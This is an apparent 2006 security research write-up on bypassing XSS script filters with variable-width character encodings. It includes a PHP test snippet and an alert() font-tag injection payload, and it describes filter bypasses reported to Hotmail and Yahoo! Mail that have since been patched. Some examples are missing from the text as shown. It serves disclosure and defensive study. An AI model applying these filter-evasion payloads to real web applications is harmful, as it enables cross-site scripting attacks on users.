Bypassing Script Filters with Variable-Width Encodings
13 Aug. 2006
We've all known that the main problem of constructing XSS attacks is how to obfuscate malicious code. In the following paragraphs Cheng will attempt to explain the concept of bypassing script filters with variable-width encodings, and disclose the applications of this concept to Hotmail and Yahoo! Mail web-based mail services.
A variable-width encoding(a.k.a variable-length encoding) is a type of character encoding scheme in which codes of differing lengths are used to encode a character set. Most common variable-width encodings are multibyte encodings, which use varying numbers of bytes to encode different characters. The first use of multibyte encodings was for the encoding of Chinese, Japanese and Korean, which have large character sets well in excess of 256 characters. The Unicode standard has two variable-width encodings: UTF-8 and UTF-16. The most commonly-used codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and EUC-KR, are examples of such two-byte EUC codes. And there are also some three-byte and four-byte codes.
Example and Discussion:
The following is a php file from which Cheng will start to introduce his idea.
echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\" >"
// NOTE: 5 space characters following the last \"
For most values of $i, Internet Explorer 6.0(SP2) will display "Char XXX is not available". When $i is between 192(0xC0) and 255(0xFF), you can see "Char XXX is available". Let's take $i=0xC0 for example, consider the following code:
Char 192 is <font face="xyz[0xC0]">not </font><font face=" onmouseover=alert(192) s=[0xC0]" >available</font>
0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in UTF-8. So when IE parses the above code, it will consider 0xC0 and the following quote as a sequence, and therefore these two pairs of FONT elements will become one with "xyz[0xC0]">not </font><font face=" as the value of FACE parameter. The second 0xC0 will start another 2-byte sequence as a value of NOTEXIST parameter which is not quoted. Due to a space character following by the quote, 0xE0-0xEF which are first bytes of 3-byte sequences, together with the following quote and one space character will be considered as the value of NOTEXIST parameter. And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the following quote and space characters will be considered as one sequence.
Here are the results of the above code parsed by Internet Explorer 6.0(SP2), Firefox 22.214.171.124 and Opera 9.0.1 in different variable-width encodings respectively. Note that the numbers in the table are the ranges of "available" characters.
Cheng doesn't think there is a typical exploitation of bypassing script filters with variable-width encodings, because the exploitation is very flexible. But you just need to remember that if the webapp use variable-width encodings, you can bury some characters following by your entry, and the buried characters might be very crucial.
The above code might be exploited in general webapps which allow you to add formatting to your entry in the same way as HTML does. For example, in some forums, [font=Courier New]message[/font] in your message will be transformed into <font face="Courier New">message</font>. Supposing it use UTF-8, we can attack by sending
Again, the exploitation is very flexible, this FONT-FONT example is just an enlightening one. The following exploitation to Yahoo! Mail is quite different from this one.
Using this method, Cheng has found two XSS vulnerabilities in Hotmail and Yahoo! Mail web-based mail services. Cheng has informed Yahoo and Microsoft on April 30 and May 12 respectively. And they have patched the vulnerabilities.
Yahoo! Mail XSS:
Before Cheng discovered this vulnerability, Yahoo! Mail filtering engine could block "expression()" syntax in a CSS attribute using a comment to break up expression( expr/* */ession() ). I used [0x81] with the following asterisk to make a sequence, so that the second */ would close the comment. But the filtering engine considered the first two comment symbol as a pair.
Content-Type: text/html; charset=GB2312